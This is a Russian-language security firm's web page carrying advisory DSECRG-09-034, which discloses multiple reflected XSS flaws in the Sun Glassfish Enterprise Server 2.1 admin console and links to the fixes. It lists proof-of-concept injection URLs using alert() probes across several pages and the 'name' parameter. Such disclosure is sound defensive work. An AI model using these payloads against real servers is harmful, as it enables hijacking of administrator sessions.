Услуги
Аудит информационной безопасности

Аудит информационной безопасности компании – многоплановая задача, в
которую входит несколько направлений анализа
ИТ-инфраструктуры и оценки защищенности приложений и устройств

Подробнее
Решения
Решения

Аккумулировав весь опыт Digital Security, мы подготовили отдельные решения по аудиту безопасности. Каждое решение объединяет специализированные услуги для конкретной отрасли бизнеса или сферы исследования. Вы можете выбрать любую из них или несколько — в комплексе

О нас
Digital Security

Практическая информационная безопасность – наша специализация и любимое дело. Уже 18 лет мы помогаем нашим клиентам уберечь сервисы и системы от киберугроз, а также активно участвуем в развитии мирового ИБ-сообщества

Подробнее
Экспертиза
Экспертиза

Для клиентов Digital Security работает команда экспертов ИБ мирового уровня. Мы получаем благодарности за вклад в обеспечение безопасности от лидеров ИТ-индустрии, а также подтверждаем свои навыки международными сертификатами в области ИБ

Подробнее
Ресурсы
Ресурсы

Мы создаем контент для тех, кому интересна информационная безопасность. Многостраничные технические статьи, бизнес-аналитика с емкими выводами, записи вебинаров и презентации с профильных конференций — все вы найдете в этом разделе

Подробнее

Мы создаем контент для тех, кому интересна информационная безопасность. Многостраничные технические статьи, бизнес-аналитика с емкими выводами, записи вебинаров и презентации с профильных конференций — все вы найдете в этом разделе

Посмотреть раздел

Масштабные исследования и аналитические обзоры. Описания хакерских инструментов и техник

Статьи и аналитические работы, полезные для бизнеса. Экспертное мнение об актуальных проблемах информационной безопасности

Видеоархив наших вебинаров и конференций. А также анонсы предстоящих мероприятий

Руководства, презентации, чек-листы. Гайды для повышения уровня осведомленности в вопросах ИБ

Наверх

DSECRG-09-034: Консоль администрирования Glassfish Enterprise Server уязвима к межсайтовому скриптингу.

Вендор

Glassfish

Продукт

Sun Glassfish Enterprise Server 2.1

Тип уязвимости

Множественный межсайтовый скриптинг

Reported

19.03.2009

Date of Public Advisory

05.05.2009

Детальное описание

Используя данные уязвимости, злоумышленник может перехватить cookie администратора и выполнить различные действия от его имени.

1. Множественный межсайтовый скриптинг
Многие страницы подвержены типовой XSS уязвимости.
Злоумышленник может внедрить скрипт в строку URL.

Пример
http://[server]/applications/applications.jsf?’);};alert(«DSecRG_XSS»);</script><!—
http://[server]/configuration/configuration.jsf?’);};alert(«DSecRG_XSS»);</script><!—
http://[server]/customMBeans/customMBeans.jsf?’);};alert(«DSecRG_XSS»);</script><!—
http://[server]/resourceNode/resources.jsf?’);};alert(«DSecRG_XSS»);</script><!—
http://[server]/sysnet/registration.jsf?’);};alert(«DSecRG_XSS»);</script><!—
http://[server]/webService/webServicesGeneral.jsf?’);};alert(«DSecRG_XSS»);</script><!—

Ответный HTML код:
<script type=»text/javascript»>
var myonload = new Object();
myonload.oldonload = window.onload;
myonload.newonload = function() {
if (‘/applications/applications.jsf?’);};alert(«DSecRG_XSS»);</script><!—‘ != ») {

 

2. Множественный межсайтовый скриптинг в GET параметре «name»
Многие страницы подвержены типовой XSS уязвимости в GET параметре «name».
Злоумышленник может внедрить скрипт в строку URL.

Пример
http://[server]/configuration/auditModuleEdit.jsf?name=<IMG SRC=javascript:alert(‘DSecRG_XSS’)>
http://[server]/configuration/httpListenerEdit.jsf?name=<IMG SRC=javascript:alert(‘DSecRG_XSS’)>&configName=server-config
http://[server]/resourceNode/jdbcResourceEdit.jsf?name=<IMG SRC=javascript:alert(‘DSecRG_XSS’)>

 

Решение
Уязвимости исправлены в CVS.
Ссылки на изменения, устраняющие уязвимости:

https://glassfish.dev.java.net/servlets/ReadMsg?list=cvs&msgNo=29669
https://glassfish.dev.java.net/servlets/ReadMsg?list=cvs&msgNo=29668
https://glassfish.dev.java.net/servlets/ReadMsg?list=cvs&msgNo=29668

Мы используем куки. Никогда такого не было, объясните

ОК